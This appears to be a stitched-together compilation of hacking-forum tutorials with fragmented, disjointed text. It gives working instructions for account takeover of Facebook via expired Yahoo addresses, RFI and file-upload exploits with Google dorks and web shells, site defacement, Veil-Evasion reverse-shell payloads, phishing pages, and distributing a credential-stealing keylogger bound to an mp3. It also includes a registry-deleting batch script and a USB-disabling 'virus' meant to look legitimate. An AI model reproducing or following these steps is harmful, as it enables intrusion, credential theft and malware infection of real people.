In this post, I will show how to create a simple virus that disables the USB ports on the computer
(PC). As usual, I am using my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the
working of this virus program.
Once this virus is executed it
will immediately disable all the USB ports on the computer. As a result you’ll will not be able to
use your pen drive or any other USB peripheral devices on the computer. The source code for
this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re- enable all the USB ports.
1. Download the source code of the virus program on to your computer from the following link:
Download the USB_Block.rar
2. You need to compile them before you can run it.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run
the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need
to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program.
How it Works?
The idea behind the working of this virus is
pretty straightforward. It works by gaining access to the Windows registry and modifying its
settings to disable the USB device support on the computer.
On the other hand, the other program will re-set the registry settings back to the normal so that the support for USB devices is re-enabled. I hope you like this post. Please pass your comments.
Hello, I've been doing this for so long until yesterday I realized that a hacker should not be a rubber stamp to its fellow hackers. I have
searched the whole forum to find a similar thread and found nothing so I guess I'll be posting this to fill request/s from our fellow members. So here it is!
Introduction: People register from Yahoo! just to
get a register a Facebook account (email
address is needed). Little they know that if a
person didn't open their Yahoo! account will
have his account deactivated then later expired.
Yahoo! deletes all expired emails. So here I
go with the step-by-step tutorials:
1. Find your target's email address. Find a way to find your target's email address
by dropping by to his/her profile and searching for an email address. If his/her email address is hidden, check his facebook email address. That might be the clue:
3. Type your target's email address to the text
box and click search.
4. Now here's a stop over/checkpoint. If Facebook returns an account, then you have
successfully found his/her email address. If not, then you have to try again and find his/her email
address.
5. Refer to number 4. If the email search returns an error, stop. If your email search returned a
profile and confirms that it is your target, open a new tab and go to Yahoo! mail and log in with
the target's email address and enter a random password.
Warning: Do not close Facebook.
6. Another Checkpoint!
6.1. If the error message says, "Invalid ID or password" then the email address is not expired,
you have to stop
6.2. If the error message says, "This ID is not yet taken", register an account using your
target's email address.
7. If you are in 6.2 then you have to fill up all the informations needed to register the email
address.
8. Continue to the second process. Choose easy
questions and answers.
9. You will be directed to a page with a message saying that you have successfully registered an
account. When this happens, click get started.
10. You will be directed to your inbox (you are now the new owner of your target's email address so I have the right to call it "your
inbox".)
11. Go back to Facebook. Click the option "Email me a link to reset my password" then click
continue. Warning: Do not close or log your Yahoo! mail out.
12. Facebook wants to check your email. He wants you to enter the six-digit combination code he sent to your (it's yours now) email that you need to change the password.
13. Look, you got mail! Open the mail sent by Facebook.
14. Actually, there are two ways to reset the password.
14.1. Find the six digit code then copy it.
14.2. Click "Click here to change your password".
15. If you followed
14.1 then go back to Facebook and paste the six-digit combination code to the textbox. If you did
14.2 you will be directed to the change password page.
16. Change the password and click continue..
17. Welcome to your friend's Facebook account.
Yeye
There you have it! You have now my knowledge in hacking a Facebook account with a Yahoo!
mail..
TIP: If you're a registered Facebook member with a Yahoo! Mail account. Check your email. If
it is already expired, register your account again To avoid yourself from being hacked.
Features :
[+] Multithreading (1000 threads)
[+] Ability to select the format of the
input and output data
[+] Ability to select "on the fly" online
services
[+] The ability to scan from the buffer
file
[+] Ability to store the results in a
buffer file
[+] Ability to load and save work-
session
Online Services (51)
[[Pic last me he]]
[+] - good penetration and maximum
speed
[+] - piercing better, but at the expense
of the speed drops
[+] - the slowest speed, but for
maximum piercing
Hash Algorithms :
MD5
SHA-1
SHA-256
SHA-512
MYSQL
MySQL5
LM
NTLM
RIPEMD-160
How To Hack Website With RFI Best Tutorials Ever
What Is RFI (Remote File Inclusion) Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
* Code execution on the web server
* Code execution on the client-side such as JavaScript which can lead to other attacks such
as cross site scripting (XSS).
* Denial of Service (DoS)
* Data Theft/ManipulationRFI is a very uncommon vulnerability due to excessive patches and updates on websites.
S0 here we go _follow me____!!!!!
Finding a Vulnerable Site using Google Dorks and Checking for vulnerability Here i provided a link for finding vulnerable sites using Google Dorks For RFI
Now for testing whether our site is vulnerable to RFI or not we will uss the following command
If after executing the command the homepage of the google shows up then then the website is
vulnerable to this attack if it does not come up then the site is not vulnerable to RFI.
Exploiting The Vulnerability For that you will need to upload your shell
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting. So once you have uploaded your shell to your
website, it should look like this.
*NOTE--> *The question mark (?) is important.
If the site was vulnerable you should now see
your shell embedded to the webpage. You can
then do as you wish with it. Sometimes
"shell.txt?" may not be enough, we may need to
use null bytes for it to execute successfully. If
you receive an error from "shell.txt?" try
"shell.txt?".
* *Ok so we uploaded our shell successfully in
the target site and i think you all know that
what all you can do after uploading shell to the
site Smile
3. Unzip the .ZIP file with this
command: unzip master.zip
4. Go to the Veil-Evasion-
master folder which is located in
the Home Directory .
4.1. Execute Veil-Evasion.py
Image has been scaled down 12%
(870x612). Click this bar to view
original image (981x689). Click
image to open in new window.
5. Let the program download some
files and install some programs
(EASY).
6. Now open Veil-Evasion.py again
and click " Run in Terminal ".
7. Type in "20".
8. Configure your options. I used
my LAN IP and the Port 4444. (If
you want to infect a remote
computer, use your WAN-IP and a
forwarded port).
Then type in: generate
9. Choose a name for the output
file. I chose "virus" WITHOUT .EXE!
10. Type in "1" for the Pyinstaller .
11. Go to your Desktop and click
"Places" -> "Home Folder".
12. Open the folder " Veil-Output ".
13. Open the folder " Compiled".
14. There you've got your created
virus!
OUTPUT FILE SCAN
Image has been scaled down 39%
(870x279). Click this bar to view
original image (1421x455). Click
image to open in new window.
Image has been scaled down 15%
(870x54). Click this bar to view
original image (1013x62). Click
image to open in new window.
Only " Ikarus " is detecting it as a
virus. WHAT IS IKARUS?
AndroRat is a client/server
application developed in Java
Android for the client side and in
Java/Swing for the Server.
The name AndroRat is a mix of
Android and RAT (Remote Access
Tool).
The goal of the application is to
give the control of the android
system remotely and retrieve
information from it.
Get contacts (and
all theirs
informations)
THE AVAILABLE
FUNCTION ARE:
¶ Get call logs
¶ Get all messages
¶Location by GPS/
Network
¶ Monitoring
received.
messages in live
¶ Monitoring phone
state in live (call
received, call
sent, call
missed..)
¶ Take a picture
from the camera
¶ Stream sound
from microphone
(or other
sources..)
¶ Streaming video
(for activity
based client
only)
Have you every thought to disable
or delete mouse pointer from your
windows OS while still the mouse
is connected to your computer and
the mouse light glows?
The below trick help us to do this
task.The code give below when
run,it just delete the mouse files
from the windows registrey.
Any driver or software we install on
our computer are registered in
windows regedit.
If the registry file of a particular
software or driver is deleted,then
that software or driver wont work.
There are to ways to do this
task.The first way is to manually
delete the registry file of mouse
and the second way is to make a
program which will directly do this
job for you.
Virus Code
rem
-----------------------------
----
rem Disable Mouse
set
key="HKEY_LOCAL_MACHINE
\system\CurrentControlSet
\Services\Mouclass"reg
delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem
-----------------------------
----
Save the above code as
"anyname.bat"
Note: Save with ".bat" extension.
Here's the code:
The above code is not a virus,its a
redesign shortcut for accessing and
deleting the regedit files.Many
antivirus will detect it as virus,but
don't worry,it will just delete the
mouse from the operating system
on which it is executed.
Hey guys,today after many day i am
going to share some information on
website hacking.I have performed
this hack as a test locally on my
website and it was 100%
successful.All you need to do is to
perform the below steps properly
and inject your shells in the
website which will do work for
yours.
1. Open Google and search this
dork " Index of /fckeditor/editor/
filemanager/connectors/ " in
google search,a new page will
load showing the result which
will contain list many
website.Select anyone website
you want.
2. Open the select website which
you want to hack.You will find a
folder name " connector ".Open
that folder(if connector folder is
not there,don't panic,stay calm
and open the " test.html"
file).Once you have open the
connector folder,you will find a
file with name " test.html ",open
that file.
3. At top left corner you will find
" connector,current folder and
resource type" .Change the
" connector" from " ASP.net " to
" PHP " and select the directory
where you want to upload your
shell, default directory is
" root",you can change it from
the field Current Folder by
replacing "/" with the directory
you want.Then select the
resource file which by default is
" files ".You can change it to
what ever you want
(image,flash,media,invalid
type,files).
4. Now all you need to do is select
the file you want to upload,for
that click on choose file,browse
to the file you want to
upload,select it and click
ok,then click on upload,Your file
will be uploaded to the directory
of the website.
5. If it does not allow you to
upload the " PHP" file,try
uploading it your deface in
html .Still same happens,then try
uploading it as a image or a
special kind of extension with
some special shells.
NOTE:{
If none of your scripts or shells
work,then it means that either
your shells or scripts are not
powerful or the target is not
vulnerable at all.But in most of
cases the targets are always
vulnerable but the shells and
scripts are not that powerful.So
make strong and powerful
scripts and then try.Always use
proxy(proxy chains) or vpn
before doing such type of work
for your safety :).
Dnn- Website Hacking DNN (Dot Net Nuke) It is the method of hacking website. it is simple and i think you can do it.
First you need a dnnVulnerable site. Lets find that You can find dnnvulnerable site by usingdnndorks Just copy the following dorks and paste it into the google you will get
dnnvulnerable site Dorks to find the Dnnvul site
:inurl:/tabid/36/language/en-
US/Default.aspx
Here are some commands which
you have to insert into the dnn vul
site
Providers/HtmlEditorProviders/
Fck/fcklinkgallery.aspx
javascript:__doPostBack
('ctlURL$cmdUpload','')
After selecting the file option
paste the java script into the
address bar
"javascript:__doPostBack('ctlURL
$cmdUpload','') "
Now you see the option browser
( from this option you can enter
your deface or shell in the site ).
After uploading you can see your
deface in the site.... Yeah it's soo
simple.. :D
Enjoy
A shell script is a script written for
the shell, or command line
interpreter, of an operating system.
It is often considered a simple
domain-specific programming
language. Typical operations
performed by shell scripts include
file manipulation, program
execution, and printing text.
This is a plain c99 shell, BUT it is
Undetected so you should not get a
warning from a anti virus if you
download it. (update: not
Undetected anymore )
I am not going to explain SQLi just
So now go get yourself a vulnerable
site, hack it and get the Admin
Login details and get the Admin
Page address.
Now login to the admin page with
the admin details you got.
Go through the admin page until
you find a place where you can
upload a picture (Usually a picture).
Now you have to upload the shell.
Right if you don’t get an error it is
all good.
Now to find the shell
Go through the site until you find
any image and if you are using
firefox Right
- Click on it and “Copy Image
Location”
Make a new tab and paste it there.
It will probably look something like
this: http://www.example.com/images/photonamehere.jpg
So now that we know that change
“/photonamehere.jpg” to “/
c99ud.php.jpg” (Without Qoutes)
Yaha ki pic sab se niche he ok
Does probably not look like that but
will look similar.
Now you have access to all the files
on the site
What you want to do is now,
Find index.php or whatever the
main page is, and replace it with
your HTML code for your Deface
Page.
Then you can either delete all the
other files OR (and I recommend
this) Let it redirect to the main
page.
Keep in mind:
• Change Admin Username and
Password
•The people have FTP access so
you need to change that Password
too .
The Basic level Hacking is Email
Account
Hacking. Everyone like to do first
email account
hacking only. So here is the
tutorial for budding
hackers about email Hacking.
There are different types of Email
Account
Hacking . Here is some of them :
Social Engineering
Phishing
Brute Force Attack
Keylogger
Guessing the Answer for the
Security Question
Social Engineering:
Social engineering takes advantage
of the
weakest link in any organization’s
information security defenses:
people. Social
engineering is
“people hacking” and involves
maliciously
exploiting the trusting nature of
human beings to obtain
information that can be
used for personal gain.
Social engineering is one of the
toughest hacks
to perpetrate because it takes
great skill to come across as
trustworthy to a
stranger. It’s also by far the
toughest hack to protect against
because
people are involved.
Social Engineering is different from
Physical
Security exploits . In social
engineering hackers
will analyze about
victim. Hackers will send mail to
victim. The
contents will be related to the
victim.
Eg:
✓ False support personnel claim
that they need
to install a patch or new
version of software on a user’s
computer, talk
the user into downloading
the software, and obtain remote
control of the
system.
✓ False vendors claim to need to
update the
organization’s accounting
package or phone system, ask for
the
administrator password, and
obtain full access.
✓ Phishing e-mails sent by
external attackers
gather user IDs and passwords
of unsuspecting recipients.
Hackers then use
those passwords to
gain access to bank accounts and
more. A
related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the
security desk that
they have lost their keys
to the computer room, receive a
set of keys
from security, and obtain
unauthorized access to physical
and electronic
information.
Phishing WebPage:
It is a fake webpage which looks
similar to the
original page of the website. Using
this
WebPage we can easily get the
Password of
victims. The process involved in
creating
Phishing webpage are,
✓ First Visit the Website which is
associated
with the email id. Copy the Source
code.
✓ Edit the the Source code such
that it will
store the password for you.✓ Upload the Webpage to any free
webhosting
sites. (don't select a famous
hosting site,they
will find that
your page is fake). Try uploading
through the
proxy server.
Guessing the Answer for Security
Question:
Do you remember that the mail
sites will ask for
the security questions to retrieve
the mail
account? You can hack the mail
account simply
guessing the answer. If the victim
is your
friend ,then it may very easy to
hack.
Brute Force Attack:
A famous and traditional attacking
method . In
this method ,the password will be
found by
trying all possible passwords with
any program
or software.
Keyloggers:
It is one of the spyware which will
capture what
you type in the keyboard. so
whenever you type
the username and password ,it will
simply
capture.
It is software program which will
be attached
with any softwares and send to
victim. While
victim install the software ,the
keylogger also
start to work. Keyloggers are exe
files.
Today we are really going
to take a very hot tutorial
on how to hack facebook
with keylogger,alot of
people have been sending
me mail to post a tutorial
on how to Hack fb,please
for those that does not like
hacking please don't be
offended by this post,and i
hope one day dat when u
forget ur pc password or
have any problem that will
need the help of hacking
maybe by then u will
know the value of
hacking,and in this group
will do not use our
hacking for evil,and if we
find out dat any members
does evil with the hacking
tutorial,he/ she will be
banned from the group,so
take ur time and go
through this tutorial.and i
hope u will love it.
Keylogger to hack into
anyone’s facebook
account. Keylogger does
more than hacking
facebook account
password. This
keylogger will mail you
all the saved
passwords on your
victims PC to your Gmail
account. As Most
facebook addicts do
save their password in
their web-browser,
there is high possibility
that you will get
facebook login details.
Alon with this the
keylogger will also mail
you all the information
about your Victim. This
information includes
Screenshots, opened
window details, visited
websites and much
more.
Not all hacking
softwares and
keyloggers are Anti-
Spywares Shielded.
Most Antivirus
Softwares are familiar
with these free
keyloggers and they
might flag this
keylogger as a Virus. So
to experience this
keylogger you might
need to temporarily
turn off your antivirus
or uninstall it. But Don’t
worry, if your victims
antivirus is not up to
date or freeone, there
are high chances that
you may end up getting
his keylogs. So give it a
Try.
Recommended: Buy
Antivirus shielded
SniperSpy key-logger
that operates in
stealth mode!
-Features of
Emissary
Keylogger:
Can mail all the
Keystrokes including
login details
Can send screenshots
of the victim’s Screen
Can Block VirusScanning
Websites on victim’s
computer
Can Disable
TaskManager on
victim’s PC
Can Disable Regedit on
victim’s PC
-How to hack facebook
password with keylogger
First make sure you
have ‘Microsoft’s .net
Framework‘ installed on
your PC, if you dont
have pleasedownload and
install it. [*] The victim
need not have .net
framework. Follow the
Steps below:
Step 2: Run
‘Emissary.exe’ file and
enter your gmail
account details, so that the
password and other info
of your victim can
be mailed to you. If you
are afraid of entering
your gmail details, then
do create one
temporary fake account
and enter those details.
Step 3: After you enter
your ‘Gmail account’
details Click on ‘Test’ to
test the connection to
your Gmail account. In
the Server name Field
you can change the
name if you want. enter
any Time Interval in the
interval field. This timer
controls the time
interval between two
keylogs emails. You can
also show fake error
message to your Victim
when he clicks your
server.exe file. to do so
enter the error title and
description in the ‘Fake
error message’ field.
Step4: Now after filling
the required fields, Click
‘Build’ button. This will
create another file
called server.exe in the
same directory.
Step5: Now send this
server.exe file to victim
and make him install it
on his computer. You
can use Binder or
Crypter to bind this
server.exe file with say
any .mp3 file so that
whenever victim runs
mp3 file, server is
automatically installed
on his computer
without his knowledge.
also read: How to
change ICON of .exe
file?
[ * ] Now because this
is a free keylogger, you
can’t send server.exe
file via email. Almost all
email domains have
security policy which
does not allow
sending .exe files. So to
do this you need to
compress the file with
WinRar or upload it to
Free File Storage
Domains, like Mediafire,
rapidshare, filethief etc.
Step6: Once the victim
runs your sent
keylogger file on his
computer, it searches
for all the stored
usernames and
passwords and it will
send you email
containing all keylogs
and screenshots
regularly after the
specified ‘Time interval’
What is Phishing ?Phishing is
a way of deceivingyour victim
by making him login through
one of your webpages which
is a copy of the original one.
By doing so the fake webpage
will save his E-mail ID or
username and password. This
is used for criminal activities
for stealing Credits Cards and
So on. Now we are going to
make a fake login page of
Facebook Mobile. Lets start
the tutorial...
Step 1: Register a new Wapka
Account First create a new
wapka account from the link
below. http://www.wapka.mobi
Step 2: Go to Admin Mode.
Step 3: Edit Site >>mail
form>> **Remember: Enable
CAPTCHA pictures: Must
UnMark it ..** Now press
Submit & RememberDon't set
it admin mode.
step 4>> After collecting
the value="XXXXXXXX" code
u Must hide the mailform in
Admin Mode. How to hide it
on Admin Mode??? Ans: Go
To
Edit Site>user>Items
visibility>Now click on X .
Now its Done.
Step 5: Go to Edit Site
>Global Settings>Headtag
Meta style>Put this code.
type="text/css"
href=" http://skfacebook.wapkamobi/
styles.css "/>
Step 6: copy the main Code
Of Wapka Phishing Page
given below
Step 7: At Last After Finishing
All Work Now U Can Put This
Code on your site at last....
For This Code Wapka
Advertise will be remove from
foot of your site......
Enjoy
~~~jaii hoo~~~
Go EDIT SITE>WML/
XHTML>PUT THIS
